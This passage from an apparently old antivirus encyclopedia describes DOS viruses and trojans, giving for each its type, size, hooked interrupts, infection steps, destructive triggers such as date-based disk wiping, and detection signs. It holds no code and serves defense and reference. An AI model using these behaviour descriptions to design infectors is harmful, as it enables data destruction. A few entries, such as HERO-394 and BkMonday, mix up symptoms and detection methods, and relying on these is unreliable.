  4281. 3) With itself loaded resident into memory it will infect any
  4282.     uninfected file that is executed. b) It doesn't infect .EXE files.
  4283.  
  4284. Damage: None
  4285.  
  4286. Detection method: Infected files increase by 302 Bytes.
  4287.  
  4288. Note: The 302 virus hooks INT 24h when infecting files. It omits I/O
  4289. errors (such as write protect).
  4290.  
  4291. [Little_Brother]
  4292. Virus Name: Little_Brother
  4293. Virus Type:  Memory Resident, File Virus (Companion Virus)
  4294. Virus Length:  250 Bytes (EXE)
  4295. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4296.  
  4297. Execution Procedure:
  4298. 1) The virus checks whether it is already loaded resident in memory.
  4299.     If "No", it then loads itself resident into memory by hooking INT
  4300.     21h.
  4301. 2) It then executes the original file.
  4302. 3) With itself loaded resident into memory it will infect any
  4303.     uninfected file that is executed.  b) It doesn't infect .COM
  4304.     files.
  4305.  
  4306. Damage: When an uninfected file is executed, the virus will create a
  4307. *.COM file with the same  name as *.EXE file (example: run "AAA.EXE",
  4308. "AAA.COM" will be created by Little_Brother).
  4309.  
  4310. Detection method: Infected files increase by 250 Bytes.
  4311.  
  4312. Note: The Little_Brother virus hooks INT 24h when infecting files.
  4313. It omits I/O errors (such as write protect).
  4314.  
  4315. [ARCV-9]
  4316. Virus Name: ARCV-9
  4317. Virus Type:  Highest Memory Resident, File Virus (infects .COM files)
  4318. Virus Length:  771 Bytes (COM)
  4319. PC Vectors Hooked: INT 21h (AX=4B00h) (execute  program), INT 24h
  4320.  
  4321. Execution Procedure:
  4322. 1) The virus checks whether it is already loaded resident in memory.
  4323.     If "No", it then loads itself resident into memory by hooking INT
  4324.     21h.
  4325. 2) It then executes the original file.
  4326. 3) With itself loaded resident into memory it will infect any
  4327.     uninfected file that is executed. b) It doesn't infect .EXE files.
  4328.  
  4329. Damage:   None
  4330.  
  4331. Detection method: Infected files increase by 771 bytes.
  4332.  
  4333. Note: The ARCV-9 virus hooks INT 24h when infecting files. It omits
  4334. I/O errors (such as write protect).
  4335.  
  4336. [NG-914]
  4337. Virus Name: NG-914
  4338. Virus Type:  Memory Resident, File Virus (infects .COM files)
  4339. Virus Length:  914 Bytes (COM)
  4340. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4341.  
  4342. Execution Procedure:
  4343. 1) The virus checks whether it is already loaded resident in memory.
  4344.     If "No", it then loads itself resident into memory by hooking INT
  4345.     21h.
  4346. 2) It then executes the original file.
  4347. 3) With itself loaded resident into memory it will infect any
  4348.     uninfected file that is executed. b) It doesn't infect .EXE files.
  4349.  
  4350. Damage: None
  4351.  
  4352. Detection method: Infected files increase by 914 Bytes.
  4353.  
  4354. Note: The NG-914 virus hooks INT 24h when infecting files. It omits
  4355. I/O errors (such as write protect).
  4356.  
  4357. [Civil510]
  4358. Virus Name: Civil510
  4359. Virus Type:  Highest Memory Resident, File Virus (infects .COM files)
  4360. Virus Length:  2080 Bytes (COM)
  4361. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4362.  
  4363. Execution Procedure:
  4364. 1) The virus checks whether it is already loaded resident in memory.
  4365.     If "No", it then loads itself resident into memory by hooking INT
  4366.     21h.
  4367. 2) It then executes the original file.
  4368. 3) With itself loaded resident into memory it will infect any
  4369.     uninfected file that is executed. b) It doesn't infect .EXE files.
  4370.  
  4371. Damage: None
  4372.  
  4373. Detection method: Infected files increase by 2080 Bytes.
  4374.  
  4375. Note: The Civil510 virus hooks INT 24h when infecting files. It omits
  4376. I/O errors (such as write protect).
  4377.  
  4378. [B3]
  4379. Virus Name: B3
  4380. Virus Type:  Memory Resident, File Virus (infects .COM files)
  4381. Virus Length:  483 Bytes (COM)
  4382. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4383.  
  4384. Execution Procedure:
  4385. 1) The virus checks whether the system date is the 26th of June;
  4386.     if "Yes", then it will destroy all data on the hard disk; if
  4387.     "No", the virus checks whether it is already loaded resident
  4388.     in memory. If "No", it then loads itself resident into memory
  4389.     by hooking INT 21h.
  4390. 2) It then executes the original file.
  4391. 3) With itself loaded resident into memory it will infect any
  4392.     uninfected file that is executed. b) It doesn't infect .EXE files.
  4393.  
  4394. Damage: If the system date is the 26th of June, then the virus will
  4395. destroy all data on the hard disk.
  4396.  
  4397. Detection method: Infected files increase by 483 Bytes.
  4398.  
  4399. Note: The B3 virus hooks INT 24h when infecting files. It omits I/O
  4400. errors (such as write protect).
  4401.  
  4402. [RKO-1]
  4403. Virus Name: RKO-1
  4404. Virus Type:  Memory Resident, File Virus
  4405. Virus Length:  None.
  4406. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4407.  
  4408. Execution Procedure:
  4409. 1) The virus checks whether the system date is the 13th; if "Yes",
  4410.     it destroys all data on the hard disk; if "No", the virus checks
  4411.     whether it is already loaded resident in memory. If "No", it
  4412.     then loads itself into resident memory by hooking INT 21h.
  4413. 2) It then executes the original file.
  4414. 3) With itself loaded resident into memory it will infect any
  4415.     uninfected file that is executed or when INT 21h is called by
  4416.     AX=11h or AX=12h.
  4417.  
  4418. Damage: If system date is the 13th, then the virus will destroy all
  4419. data on the hard disk.
  4420.  
  4421. Detection method:  None
  4422.  
  4423. Note: The RKO-1 virus hooks INT 24h when infecting files. It omits
  4424. I/O errors (such as write protect).
  4425.  
  4426. [Dame]
  4427. Virus Name: Dame
  4428. Virus Type:  Memory Resident, File Virus (Mutation Engine)
  4429. Virus Length:  None
  4430. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4431.  
  4432. Execution Procedure:
  4433. 1) The virus checks whether it is already loaded resident in memory.
  4434.     If "No", it then loads itself resident into memory by hooking
  4435.     INT 21h.
  4436. 2) It then executes the original file.
  4437. 3) With itself loaded resident into memory it will infect any
  4438.     uninfected file that is executed.
  4439. 4) After it has infected files, it will check the time. If the time
  4440.     is between 12:00 A.M. and 12:30 A.M., it will show the message:
  4441.     "Don't worry, you are not alone at this hour.... This Virus is
  4442.     NOT dedicated to Sara. It's dedicated to her Groove (...That s
  4443.     my name).. This Virus is only a test therefor ..  be ready for
  4444.     my Next Test..."
  4445.  
  4446. Damage: None
  4447.  
  4448. Detection method: None
  4449.  
  4450. Note:
  4451. 1) The Dame virus hooks  INT 24h when infecting files.  It omits
  4452.     I/O errors (such as write protect).
  4453. 2) The virus will encode itself, before it infects files. And the
  4454.     method of encoding depends on the time. So it will be different
  4455.     in every file.
  4456.  
  4457. [7thson]
  4458. Virus Name: 7thson
  4459. Virus Type: Memory Resident, File Virus (Companion)
  4460. Virus Length: 321 or 307 Bytes (EXE)
  4461. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4462.  
  4463. Execution Procedure:
  4464. 1) The virus checks whether it is already loaded resident in memory.
  4465.     If "No", it then loads itself resident into memory by hooking INT
  4466.     21h.
  4467. 2) It then executes the original file.
  4468. 3) With itself loaded resident into memory it will infect any
  4469.     uninfected file that is executed.  b) It doesn't infect .COM files.
  4470.  
  4471. Damage: When you run an .EXE file, the virus will create a new .COM
  4472. file with  the same name as .EXE file and the length equals to 321 or
  4473. 307 Bytes.
  4474.  
  4475. Detection method: Check whether there are some COM files with length
  4476. equal to 321 or 307 Bytes.
  4477.  
  4478. Note: The 7thson virus hooks INT 24h and closes the "control_break"
  4479. command when infecting files. It omits I/O errors (such as write
  4480. protect).
  4481.  
  4482. [Geoff]
  4483. Virus Name: Geoff
  4484. Virus Type:  Trojan
  4485. Virus Length:  5952 Bytes
  4486. PC Vectors Hooked: INT 24h
  4487.  
  4488. Execution Procedure:
  4489. 1) Doesn't infect any file or partition or boot sector.
  4490. 2) Before destruction, it shows the message:
  4491.     "Search And Destroy Loading v1.0 Bringing The Best And Latest
  4492.     Warex....... Press [ENTER] to Start The Game."
  4493. 3) It then destroys all data of all disks if drives are ready.
  4494. 4) After destroying , it shows the message: "Hey Geoff You know what
  4495.     happened a few days ago? Some friend asked me to get rid of
  4496.     you,........ P.S. I have nothing personal against you! You just
  4497.     FUCKED with the Cold Brother and I had to take you down, again."
  4498.  
  4499. Damage: Destroys all data on all disks if drives are ready.
  4500.  
  4501. Detection method: Check for files with length equal to 5952 Bytes.
  4502.  
  4503. Note:
  4504. 1) Doesn't stay resident in memory.
  4505. 2) Geoff hooks INT 24h when destroying. It omits I/O errors (such as
  4506.     write protect).
  4507.  
  4508. [CMOSKill]
  4509. Virus Name: Cmoskill
  4510. Virus Type: Trojan
  4511. Virus Length: 29 Bytes
  4512. PC Vectors Hooked: None
  4513.  
  4514. Damage:  Deletes all CMOS data
  4515.  
  4516. Detection method:  None
  4517.  
  4518. Note:
  4519. 1) Doesn't stay resident in memory.
  4520. 2) Doesn't infect any files or partition or boot sector.
  4521.  
  4522. [Killboot]
  4523. Virus Name: Killboot
  4524. Virus Type: Trojan
  4525. Virus Length: 32000 Bytes
  4526. PC Vectors Hooked: None
  4527.  
  4528. Damage: Destroys all data in the BOOT SECTOR of C:\ and B:\, then
  4529. shows a line of codes and then the system halts.
  4530.  
  4531. Detection method:  None
  4532.  
  4533. Note:
  4534. 1) Doesn't stay resident in memory.
  4535. 2) Doesn't infect any files or partition.
  4536.  
  4537. [NUKEX]
  4538. Virus Name: NUKEX
  4539. Virus Type: Trojan
  4540. Virus Length: 469 Bytes
  4541. PC Vectors Hooked: None
  4542.  
  4543. Damage:  Deletes all files on the hard disk (including all
  4544. subdirectories).
  4545.  
  4546. Detection method:  None
  4547.  
  4548. Note:
  4549. 1) Doesn't stay resident in memory.
  4550. 2) Doesn't infect any files or partition or boot sector.
  4551.  
  4552. [Fire]
  4553. Virus Name: Fire
  4554. Virus Type: Trojan
  4555. Virus Length: 4304 Bytes
  4556. PC Vectors Hooked: INT 24h
  4557.  
  4558. Damage:  Destroys all data on all disks if drives are ready, then it
  4559. makes a sound.
  4560.  
  4561. Detection method:  Check for files with length equal to 4304 Bytes.
  4562.  
  4563. Note:
  4564. 1) Doesn't stay resident in memory.
  4565. 2) Doesn't infect any files  or partition or boot sector.
  4566. 3) The Fire virus  hooks INT 24h when destroying. It omits I/O errors
  4567.     (such as write protect).
  4568.  
  4569. [Secto]
  4570. Virus Name: Secto
  4571. Virus Type: Trojan
  4572. Virus Length: 487 Bytes
  4573. PC Vectors Hooked: None
  4574.  
  4575. Damage:  Destroys data on the boot sector of A:\.
  4576.  
  4577. Detection method:  None
  4578.  
  4579. Note:
  4580. 1) Doesn't stay resident in memory.
  4581. 2) Doesn't infect any files or partition.
  4582. 3) Doesn't hook INT 24h when destroying. An error message appears if
  4583.     there is an I/O error (such as write protect).
  4584.  
  4585. [MSK]
  4586. Virus Name: MSK
  4587. Virus Type: Trojan
  4588. Virus Length: 272 Bytes
  4589. PC Vectors Hooked: None
  4590.  
  4591. Damage:  Destroys all data on the hard disk.
  4592.  
  4593. Detection method:  Check for files with length equal to 272 Bytes.
  4594.  
  4595. Note:
  4596. 1) Doesn't stay resident in memory.
  4597. 2) Doesn't infect any files or partition or boot sector.
  4598.  
  4599. [Dropper]
  4600. Virus Name: Dropper
  4601. Virus Type: Trojan
  4602. Virus Length: 3103 Bytes
  4603. PC Vectors Hooked: None
  4604.  
  4605. Damage:  Deletes all files on disks.
  4606.  
  4607. Detection method:  Check whether there are files with 3103 Bytes.
  4608.  
  4609. Note:
  4610. 1) Doesn't stay resident in memory.
  4611. 2) Doesn't infect any files or partition or boot sector.
  4612. 3) Dropper doesn't hook INT 24h when destroying. An error message
  4613.     appears if there is an I/O error ( such  as write protect).
  4614.  
  4615. [RNA#1]
  4616. Virus Name: RNA#1
  4617. Virus Type: File Virus (infects .COM and .EXE files)
  4618. Virus Length: 7296 Bytes(COM and EXE)
  4619. PC Vectors Hooked: INT 24h
  4620.  
  4621. Execution Procedure:
  4622. 1) Searches for COM and EXE files on the C:\ drive.
  4623. 2) If found, it then deletes them (deletes four files at a time).
  4624. 3) When the files are deleted, the virus will create a file named
  4625.     "ZSQA.TH" on drive C:\.
  4626.  
  4627. Damage: It will delete files on the C:\ drive.
  4628.  
  4629. Detection method:  Infected files will increase by 7296 Bytes.
  4630.  
  4631. Note:
  4632. 1) Doesn't stay resident in memory.
  4633. 2) The RNA#1 hooks INT 24h when infecting files. It omits I/O errors
  4634.     (such as write protect).
  4635.  
  4636. [RNA#2]
  4637. Virus Name: RNA#2
  4638. Virus Type: File Virus (infects .COM and .EXE files)
  4639. Virus Length: 7408 Bytes (COM and EXE)
  4640. PC Vectors Hooked: None
  4641.  
  4642. Execution Procedure:
  4643. 1) Searches for COM and EXE files on the C:\ drive.
  4644. 2) The virus infects files four at a time.
  4645.  
  4646. Damage:  None
  4647.  
  4648. Detection method: Infected files will increase by 7408 Bytes.
  4649.  
  4650. Note:
  4651. 1) Doesn't stay resident in memory.
  4652. 2) RNA#2 doesn't hook INT 24h when infecting files. It omits I/O
  4653.     errors (such as write protect).
  4654.  
  4655. [Medical]
  4656. Virus Name: Medical
  4657. Virus Type: File Virus (infects .COM files)
  4658. Virus Length: 189 Bytes (COM)
  4659. PC Vectors Hooked: None
  4660.  
  4661. Execution Procedure:
  4662. 1) Searches for a .COM file in the current directory.
  4663. 2) It checks whether it has been infected by Medical; if "Yes", it
  4664.     continues to look for another .COM file.
  4665. 3) It only infects one file at a time.
  4666.  
  4667. Damage:  None
  4668.  
  4669. Detection method:  Infected files will increase by 189 Bytes.
  4670.  
  4671. Note: Doesn't stay resident in memory. Medical doesn't hook INT 24h
  4672. when infecting files. It omits I/O errors (such as write protect).
  4673.  
  4674. [Bob]
  4675. Virus Name: Bob
  4676. Virus Type: File Virus (infects .COM files)
  4677. Virus Length: 1117 Bytes (COM)
  4678. PC Vectors Hooked: INT 8h
  4679.  
  4680. Execution Procedure:
  4681. 1) Searches for a .COM file in the current directory.
  4682. 2) It checks whether it has been infected by Bob. If "Yes", it
  4683.     continues to look for an uninfected .COM file.
  4684. 3) It only infects three files at a time.
  4685. 4) It then checks whether the system date is the 7th of  September;
  4686.     if "Yes", the virus will hook INT 8h, and about 5 minutes later,
  4687.     one of the following messages is displayed on the screen: "Bob
  4688.     Ross lives!", "Bob Ross is watching!", "Maybe he lives here....."
  4689.     and so on.
  4690.  
  4691. Damage: If it is September 7, then a message will appear on the
  4692. screen.
  4693.  
  4694. Detection method:  Infected files will increase by 1117 Bytes.
  4695.  
  4696. Note:
  4697. 1) Doesn't stay resident in memory.
  4698. 2) Bob doesn't hook INT 24h when infecting files. It omits I/O errors
  4699.     (such as write protect).
  4700.  
  4701. [Cannabis]
  4702. Virus Name: Cannabis
  4703. Virus Type: Floppy Boot Infector
  4704. Virus Length: None.
  4705. PC Vectors Hooked: INT 13h
  4706.  
  4707. Execution Procedure:
  4708. 1) When the system is booted from an infected disk, there will be a
  4709.     1K decrease in the total system memory.
  4710. 2) It then hooks INT 13h.
  4711. 3) When you turn on the computer, the diskette will be infected by
  4712.     hooking INT 13h.
  4713.  
  4714. Damage:  None
  4715.  
  4716. Detection method:  Total memory size will decrease by 1K Bytes.
  4717.  
  4718. Note:
  4719. 1) Cannabis doesn't hook INT 24h when infecting files. It omits
  4720.     I/O errors (such as write protect).
  4721.  
  4722. [Daisy]
  4723. Virus Name: Daisy
  4724. Virus Type:  File Virus (infects .EXE files)
  4725. Virus Length: No change.
  4726. PC Vectors Hooked: None
  4727.  
  4728. Execution Procedure:
  4729. 1) Displays a smiling face and a message on the screen: "Hi, I'm Crazy
  4730.     Daisy!...   I'll format your HARD DISK! ... Say goodbye to your
  4731.     files!"
  4732. 2) The virus then searches for an .EXE file in the A:\ drive.
  4733. 3) It  checks whether it has been infected by Daisy before. If
  4734.     "Yes", it continues to look for another uninfected .EXE file.
  4735. 4) It infects all the .EXE files on the A:\ drive.
  4736. 5) Then the system halts.
  4737.  
  4738. Damage:
  4739. 1) When all of the .EXE files on the A:\ drive have been infected,
  4740.     the system halts.
  4741. 2) Overwrites original files, so the length of infected files won't
  4742.     increase.
  4743. 3) When an infected file is executed, it randomly displays one of the
  4744.     following messages:
  4745.     "Pretty day today - isn't it?"
  4746.     "Don't worry - sing a song!"
  4747.     "Life isn't easy!"
  4748.     "Don't halt your computer! Let's be friends!"
  4749.  
  4750. Detection method:  None
  4751.  
  4752. Note:
  4753. 1) Doesn't stay resident in memory.
  4754. 2) Daisy doesn't hook INT 24h when infecting files. It omits I/O errors
  4755.     (such as write protect).
  4756.  
  4757. [Son of PSMPC]
  4758. Virus Name: SON_OF_PSMPC
  4759. Virus Type:  Virus Generator
  4760. Virus Length: 17741 Bytes
  4761. PC Vectors Hooked: None
  4762.  
  4763. Execution Procedure:
  4764. 1) This is a "virus generator." When you execute PC-MPC A.CFG B.CFG...,
  4765.     then A.ASM B.ASM..., are generated. These will be viruses after
  4766.     compiling and linking.
  4767.  
  4768. Detection method:  None
  4769.  
  4770. Note:
  4771. 1) Doesn't stay resident in memory.
  4772. 2) SON_OF_PSMPC doesn't hook INT 24h when infecting files. It omits
  4773.     I/O errors (such as write protect).
  4774. 3) These generated files can have different functions such as encoding
  4775.     or infecting the COMMAND.COM file.
  4776.  
  4777. [Ear]
  4778. Virus Name: EAR
  4779. Virus Type: File Virus (infects .COM and .EXE files)
  4780. Virus Length: 1024 Bytes
  4781. PC Vectors Hooked: None
  4782.  
  4783. Execution Procedure:
  4784. 1) The virus searches for an .EXE or .COM file in the current directory.
  4785. 2) It checks whether it has been infected by EAR. If "Yes", it
  4786.     continues to look for an uninfected .COM or .EXE file.
  4787. 3) It continues infecting all COM and EXE files in the current and
  4788.     the "mother" directories until they are all infected.
  4789. 4) It then checks whether the system date is the 1st day of the month;
  4790.     if "Yes", a message appears on the screen: " PHALON/SKISM 1992
  4791.     [Ear-6] Alert! Where is the Auditory Canal located? 1. External
  4792.     Ear   2. Middle Ear 3. Inner Ear ", then waits for your choice.
  4793. 5) If you press "1" or "3", you get the following message: " Wow,
  4794.     you own your ears! Please resume work.", then it executes the
  4795.     original file.
  4796. 6) If you press "2" the following message appears: "You obviously no
  4797.     nothing about ears. Try again after some study.", then the program
  4798.     ends and doesn't execute the original file.
  4799.  
  4800. Damage: If system date is the 1st day of the month, a message will
  4801. appear on the screen.
  4802.  
  4803. Detection method:  Infected files will increase by 1024 Bytes.
  4804.  
  4805. Note:
  4806. 1) Doesn't stay resident in memory.
  4807. 2) EAR doesn't hook INT 24h when infecting files. It omits I/O errors
  4808.     (such as write protect).
  4809.  
  4810. [Dir2-910]
  4811. Virus Name: DIR2-910
  4812. Virus Type: File Virus (infects .COM and .EXE files)
  4813. Virus Length: 1024 Bytes
  4814. PC Vectors Hooked: None
  4815.  
  4816. Execution Procedure:
  4817. 1) When the virus loads itself resident in memory it will change the
  4818.     directory structure data, so that certain executable files are
  4819.     linked to itself.
  4820. 2) When you execute a file to which the DIR2-910 virus has a link,
  4821.     the virus is also executed. At this point it can begin to
  4822.     infect other files.
  4823. 3) The virus stays resident in memory but doesn't hook any interrupts.
  4824.     It uses another function to infect files.  It infects .COM and
  4825.     .EXE files when they are "READ & WRITE".
  4826.  
  4827. Damage:  When all the .COM and .EXE files have been infected on a
  4828. disk, then it will not be possible to execute any files from the disk.
  4829.  
  4830. Detection method: Check the disk by using CHKDSK.EXE. If some files
  4831. are crossed-linked to the same position, then these files must be
  4832. infected.
  4833.  
  4834. Note: DIR2-910 doesn't hook INT 24h when infecting files. It omits
  4835. I/O errors (such as write protect).
  4836.  
  4837. [INOK-2372]
  4838. Virus Name: INOK-2372
  4839. Virus Type: File Virus (infects .COM files)
  4840. Virus Length: 2372 Bytes
  4841. PC Vectors Hooked: None
  4842.  
  4843. Execution Procedure:
  4844. 1) When the virus is executed , the following two functions are
  4845.     selected at random.
  4846.     a) It searches for a .COM file in the current directory. Then it
  4847.         checks whether it has been infected  by INOK- 2372. If "Yes",
  4848.         it continues to look for another uninfected .COM file. It only
  4849.         infects one file at a time. Then it executes the original
  4850.         file.
  4851.     b) Creates a file name "ICONKIN.COM" in the current directory,
  4852.         then it executes the file. When the file is executed, a window
  4853.         appears on the screen until you press a key, and after a while
  4854.         the window appears again.
  4855.  
  4856. Damage:  None
  4857.  
  4858. Detection method:
  4859. 1) Infected files will increase by 2372 Bytes.
  4860. 2) Check for a strange window.
  4861.  
  4862. Note:
  4863. 1) Doesn't stay resident in memory.
  4864. 2) INOK-2372 doesn't hook INT 24h when infecting files. It omits I/O
  4865.     errors (such as write protect).
  4866.  
  4867. [Multi-2]
  4868. Virus Name: Multi-2
  4869. Virus Type: Partition Table Infector, File Virus (.COM and .EXE files)
  4870. Virus Length: Not Applicable
  4871. PC Vectors Hooked: INT 21h, INT 24h, INT 1Ch, INT 13h
  4872.  
  4873. Execution Procedure:
  4874. 1) The virus will decrease the total system memory by 3K Bytes when
  4875.     the system is booted from an infected disk.
  4876. 2) It then checks whether it is loaded resident in memory; if "No",
  4877.     then it will load resident to the last 3K bytes of memory by
  4878.     hooking INT 21h and INT 1Ch.
  4879. 3) It infects files when they are executed.
  4880.  
  4881. Damage: None
  4882.  
  4883. Detection method: Infected files increase by 927-1000 Bytes.
  4884.  
  4885. Note:  Multi-2 hooks INT 24h when infecting files. It omits I/O errors
  4886. (such as write protect).
  4887.  
  4888. [BFD]
  4889. Virus Name: BFD
  4890. Virus Type: Boot Virus, File Virus
  4891. Virus Length: No change
  4892. PC Vectors Hooked: INT 13h, INT 24h
  4893.  
  4894. Execution Procedure:
  4895. 1) The virus decreases the total system memory by  2K Bytes when
  4896.     the system is booted from an infected disk.
  4897. 2) It loads itself resident in the last 4K Bytes of memory.
  4898. 3) It hooks INT 13h.
  4899. 4) When you turn on the computer the resident memory virus infects
  4900.     the boot sector and files when reading and writing uninfected
  4901.     disks or programs.
  4902.  
  4903. Damage: Overwrites original files, so the length of infected files
  4904. won't increase.
  4905.  
  4906. Detection method:  None
  4907.  
  4908. Note:
  4909. 1) BFD hooks INT 24h when infecting files or the boot sector. It
  4910.     omits I/O errors (such as write protect).
  4911.  
  4912. [BFD-B]
  4913. Virus Name: BFD-B
  4914. Virus Type: File Virus, Boot Sector Infector (Multi-partite Virus)
  4915. Virus Length: No change
  4916. PC Vectors Hooked: INT 13h, INT 24h
  4917.  
  4918. Execution Procedure:
  4919. 1) When you execute the file, it will check whether the boot sector
  4920.     of the hard disk has been infected; if "No", it will infect the
  4921.     boot sector.
  4922. 2) It then checks whether it has loaded itself resident in memory;
  4923.     if "No", then it loads itself resident in memory by hooking
  4924.     INT 21h and INT 13h.  After the virus has loaded itself resident
  4925.     in memory it will infect boot sectors and files while reading and
  4926.     writing uninfected disks or programs.
  4927.  
  4928. Damage: Overwrites original files, so the length of infected files
  4929. won't increase.
  4930.  
  4931. Detection method:  None
  4932.  
  4933. Note:
  4934. 1) BFD hooks INT 24h when infecting files or boot sectors. It omits
  4935.     I/O errors (such as write protect).
  4936.  
  4937. [XQR]
  4938. Virus Name: XQR
  4939. Virus Type: Partition table Infector, File Virus
  4940. Virus Length: Not Applicable
  4941. PC Vectors Hooked: INT 21h, INT 24h, INT 13h, INT 8h
  4942.  
  4943. Execution Procedure:
  4944. 1) The virus decreases the total system memory by 4K Bytes when the
  4945.     system is booted from an infected disk.
  4946. 2) The virus loads itself resident into the last 4K Bytes of memory.
  4947. 3) It then hooks INT 13h.
  4948. 4) When the computer is turned on normally the virus will check
  4949.     whether the system date is May 4; if "Yes", a message will appear
  4950.     on the screen: " XQR: Wherever, I love you Forever and ever! The
  4951.     beautiful memory for ours in that summer time has been recorded
  4952.     in Computer history . Bon voyage, my dear XQR! "
  4953. 5) It continues to infect any executed program.
  4954.  
  4955. Damage:  When it is Sunday, the virus will change the keyboard
  4956. settings.
  4957.  
  4958. Detection method:  Check the keyboard functionality.
  4959.  
  4960. Note: XQR hooks INT 24h when infecting files. It omits I/O errors
  4961. (such as write protect).
  4962.  
  4963. [Bogus]
  4964. Virus Name: BOGUS
  4965. Virus Type: Partition table Infector, File Infector Virus
  4966. Virus Length: No change
  4967. PC Vectors Hooked: INT 21h, INT 24h, INT 13h
  4968.  
  4969. Execution Procedure:
  4970. 1) The virus decreases the total system memory by 4K Bytes when the
  4971.     system is booted from an infected disk.
  4972. 2) The virus loads itself resident into the last 4K Bytes of memory.
  4973. 3) It then hooks INT 13h.
  4974. 4) It continues to infect any executed program.
  4975.  
  4976. Damage:  When the number of infected files is larger than 2710, then
  4977. it destroys all data on the hard disk.
  4978.  
  4979. Detection method:  Check whether the file head is INT 13h (AX=90 or
  4980. 91).
  4981.  
  4982. Note:
  4983. 1) BOGUS hooks INT 24h when infecting files. It omits I/O errors
  4984.     (such as write protect).
  4985. 2) If the computer is booted from a diskette, you will not be able to
  4986.     view the hard drive.
  4987.  
  4988. [Invol-1]
  4989. Virus Name: INVOL-1
  4990. Virus Type: EXE and SYS and File Infector Virus
  4991. Virus Length: 1350/60 Bytes (EXE), 2720 Bytes (SYS)
  4992. PC Vectors Hooked: INT 21h
  4993.  
  4994. Execution Procedure:
  4995.  
  4996. EXE File:
  4997. 1) The virus searches for the first command of C:\CONFIG.SYS; if the
  4998.     command is *.*=xxxx.yyy the virus will infect the file.
  4999. 2) Then it finishes executing the original file.
  5000. 3) The file infects when an uninfected program is executed.
  5001.  
  5002. SYS File:
  5003. 1) Hooks INT 21h and loads itself resident in memory.
  5004. 2) Executes the original file.
  5005.  
  5006. Damage:  Checks whether it is 20th of the month; if "Yes", then it
  5007. destroys all hard disk data.
  5008.  
  5009. Detection method: Infected .EXE files increase by 1350 Bytes, SYS
  5010. files increase by 2720 Bytes.
  5011.  
  5012. Note:
  5013. 1) INVOL-1 doesn't hook INT 24h when infecting files. It omits I/O
  5014.     errors (such as write protect).
  5015.  
  5016. [August16]
  5017. Virus Name: August16
  5018. Other names: Iron maiden
  5019. Virus Type: Parasitic Virus (infects .COM files)
  5020. Virus Length: 636 Bytes
  5021. PC Vectors Hooked: Int 21
  5022.  
  5023. Execution Procedure:
  5024. 1) The virus checks whether the first two .COM files in the current
  5025.     directory have been infected.
  5026. 2) If "No" it will proceed to infect them.
  5027. 3) If "Yes" it checks the current directory on the C:\ drive to see
  5028.     whether it has two .COM files.
  5029. 4) If "Yes" it will proceed to infect them.
  5030. 5) Then the original file is executed.
  5031.  
  5032. Damage:
  5033. 1) August16 overwrites the original file to hide changes to the file's
  5034.     date and time in the directory listing.
  5035. 2) Adds two text strings to infected files: "*.COM AA", "=!=IRON
  5036.     MAIDEN."
  5037.  
  5038. Detection method:
  5039. 1) .COM file growth.
  5040. 2) Unexpected access to the C:\ drive.
  5041.  
  5042. Note: August16 doesn't hook INT 24h when infecting files. An error
  5043. message appears if there is an I/O error (such as write protect).
  5044.  
  5045. [BkMonday]
  5046. Virus Name: BKMonday
  5047. Other names: Virus 1055
  5048. Virus Type: File Virus
  5049. Virus Length: 1055 bytes
  5050. PC Vectors Hooked:  Int 21
  5051.  
  5052. Damage: Formats first 240 cylinders of the first hard drive.
  5053.  
  5054. Detection method: Overwrites the original file in order to hide changes
  5055. to the file after infection.
  5056.  
  5057. Note: Loads itself resident in memory.  An error message appears if
  5058. there is an I/O error (such as write protect).
  5059.  
  5060. [Devil's_Dance]
  5061. Virus Name: Devil's_Dance
  5062. Other names: Virus 941
  5063. Virus Type: File Virus
  5064. Virus Length: 941 bytes
  5065. PC Vectors Hooked:  Int 21
  5066.  
  5067. Execution Procedure:
  5068. 1) The virus checks whether it is already loaded resident in memory.
  5069.     If "No", it then loads itself resident into memory by hooking INT
  5070.     21h.
  5071. 2) It then executes the original file.
  5072. 3) With itself loaded resident into memory it will infect any
  5073.     uninfected file that is executed.
  5074.  
  5075. Damage: The Devil's_Dance virus monitors Int 9 (keyboard). A routine for
  5076. cursor manipulation is activated when 5 keys other than the  Alt key
  5077. have been depressed. Furthermore, if the  Alt key is not depressed,
  5078. attributes of the cursor in Video-RAM are changed after any other key
  5079. is pressed.  The new attributes are as follows: 09h (bright blue), 0ah
  5080. (bright green), obh (bright cyan), 0ch (bright red), 0dh (bright
  5081. violet), oeh (bright yellow). If the above five keys are not pressed,
  5082. the virus will not manifest itself. If Del is depressed, the virus will
  5083. display characters using the color white.  The virus displays the
  5084. following message: "Have you ever danced with the devil under the
  5085. weak light of the moon?.... Pray for your disk...The Joker HAHAHAHAHAHA
  5086. HAHAHAHA."
  5087.  
  5088. The virus will finally test whether any keys were pressed 2500 times.
  5089. If yes, the virus overwrites the Disk Partition Table of the first hard
  5090. disk and proceeds to crash the system.
  5091.  
  5092. Note:  Loads itself resident in memory.  An error message appears if
  5093. there is an I/O error (such as write protect).
  5094.  
  5095. [Hero-394]
  5096. Virus Name: HERO-394
  5097. Other names: None
  5098. Virus Type: File Virus
  5099. Virus Length: Increases infected EXE file size by 394 bytes.
  5100.  
  5101. Damage: None
  5102.  
  5103. Detection method: The virus will check the system date. If it is the
  5104. first day of the month, a confusing code will be displayed on the
  5105. screen.
  5106.  
  5107. [NOPX_2.1]
  5108. Virus Name: NOPX_2.1
  5109. Other names: None
  5110. Virus Type: File Virus
  5111. Virus Length: Increases infected .EXE file size by 1686 bytes,
  5112.                      also .COM file.
  5113. PC Vectors Hooked:  Int 21
  5114.  
  5115. Execution Procedure:
  5116. 1) The virus checks whether it is already loaded resident in memory.
  5117.     If "No", it then loads itself resident into memory by hooking INT
  5118.     21h.
  5119. 2) It then executes the original file.
  5120. 3) With itself loaded resident into memory it will infect any
  5121.     uninfected file that is executed.
  5122.  
  5123. Damage: The virus has bugs in itself (Error in calculating entry
  5124. point). So some infected EXE files can't be executed correctly.
  5125.  
  5126. Detection method: Increase in infected file size by 1686 bytes.
  5127.  
  5128. Note:  Loads itself resident in memory.  An error message appears if
  5129. there is an I/O error (such as write protect).
  5130.  
  5131. [NCU_LI]
